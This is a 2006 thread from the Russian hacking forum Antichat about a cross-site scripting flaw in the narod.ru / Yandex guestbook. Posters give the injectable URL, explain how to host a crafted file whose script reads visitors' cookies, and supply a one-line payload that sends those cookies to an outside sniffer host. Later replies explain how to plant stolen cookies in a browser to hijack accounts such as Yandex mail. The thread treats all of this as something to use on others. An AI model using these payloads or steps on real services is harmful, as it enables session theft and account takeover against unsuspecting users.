Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   Xss народ.ру (https://forum.antichat.xyz/showthread.php?t=24905)

bul.666 05.10.2006 10:38
Xss народ.ру
 
Не знаю было это или нет... Вообщем читаемс...

1. _http://www.narod.ru/guestbook/?owner=49329156&mainhtml=%3Cscript%3Ealert()%3C/script%3E
2. Создали себе сайт с гостевой книгой...
Создайем на сайте файл - text.txt

Зайходим в сорцы нашей гесты, копирусем все и вставляем в text.txt...

Теперь надо нам просто добавить скрипт - ловушку, я добавил просто
<script>alert(document.cookie);</script>...

Правим сцылку... Первоночально сцылка на гесту показывает нам, что гостевуха в домене narod.ru, а значит там нам не будет показываться полные куки...
Ну дык какая хрен разница? Исправим ейе на narod.yandex.ru...

Теперь а чтоже делать с text.txt? Добавляем к ссылке на гесту &mainhtml=text.txt

Теперь заходим по этой ссылке и видимс наши печенюшки =)))

Извиняюсь, если это уже где то было... =))))

Вот моя геста = _http://www.narod.yandex.ru/guestbook/?owner=49329156&mainhtml=text.txt

Скажу сразу там нет снифера! =))))

Murt@zaa 05.10.2006 16:41
Все круто но вот вопрос как примерно сделаь чтобы кукисы на сниффер отсылались? и еще, сижу я в мастерской и открываю твою ссылку мне выдаются кукисы моей страницы на народе. А если в это время сидеть в ящике от yandexa то выдадутся кукисы от ящика???

bul.666 05.10.2006 16:43
Цитата:
yandexa то выдадутся кукисы от ящика???
Да! =)

Цитата:
как примерно сделаь чтобы кукисы на сниффер отсылались?
Код:
<script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>

Murt@zaa 05.10.2006 16:51
Так как у меня ящика на яндексе нет задам еще вопрос куда вставлять полученные куки? в строку браузера ? типа id= *****полученные куки***** ???

D=P=CH= MOD= 05.10.2006 16:55
Цитата:
Так как у меня ящика на яндексе нет задам еще вопрос куда вставлять полученные куки? в строку браузера ? типа id= *****полученные куки***** ???
Нет в строку браузера вобще то только сессию можно подставить.
Куки подмени в текстовом файле, там где все твои куки. (пример: C:\Documents and Settings\...\Cookies)
Или если там пароль не зашифрован, то просто впиши его.

Murt@zaa 05.10.2006 16:58
D=p=ch= Mod= Спасибо что напомнил! Помню читал где то давно, а щас забыл голова то дырявая. Ну че юзаем по тихоньку Xss :)

bul.666 05.10.2006 16:59
Если ты пользователь Оперы, то заходи Инструменты->Дополнительно->Cookies...
Находи домен яндекса и меняй значения... =))

ZaCo 05.10.2006 19:29
баян, было где-то с полгода назад. хсс глупость там есть вещи помощнее.

bul.666 05.10.2006 19:51
Цитата:
хсс глупость там есть вещи помощнее
SQL? PHPinj? Чеж не пользуешься? Или не продаж? Богатым станешь... Мы пока еще дети нам учиться и учиться...

ground_zero 17.10.2006 22:32
необессутьте что вмешался но хотелосьбы продолжения темы чо там за штука помощьней ?


Время: 09:39